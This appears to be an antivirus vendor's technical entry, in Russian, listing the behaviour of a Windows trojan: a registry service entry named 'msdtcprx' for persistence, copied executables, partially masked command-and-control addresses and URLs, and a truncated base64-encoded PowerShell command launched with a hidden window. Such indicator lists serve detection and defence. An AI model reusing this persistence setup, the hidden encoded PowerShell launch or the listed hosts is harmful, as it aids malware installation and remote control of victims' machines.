Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msdtcprx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msdtcprx] 'ImagePath' = '"%WINDIR%\SysWOW64\msaudite\msdtcprx.exe"'
- 'msdtcprx' "%WINDIR%\SysWOW64\msaudite\msdtcprx.exe"
- 'msdtcprx' %WINDIR%\SysWOW64\msaudite\msdtcprx.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgAC...
- %HOMEPATH%\273.exe
- %WINDIR%\syswow64\msaudite\msdtcprx.exe
- %HOMEPATH%\273.exe в %WINDIR%\syswow64\msaudite\msdtcprx.exe
- '73.##6.193.136':80
- '18#.#4.252.13':443
- http://ar#####oductions.com/cgi-bin/xHdbmk/
- http://wh####edownfarm.com/cgi-bin/tlsjw81/
- http://18#.##.252.13:443/Bys2sbqNb2h/dSj4o7vE5F7lgijVmS/FSBtYtTzgr0gmWIpy0/BHEl/ via 18#.#4.252.13
- DNS ASK ar#####oductions.com
- DNS ASK wh####edownfarm.com
- '%HOMEPATH%\273.exe'
- '%WINDIR%\syswow64\msaudite\msdtcprx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgAC...' (со скрытым окном)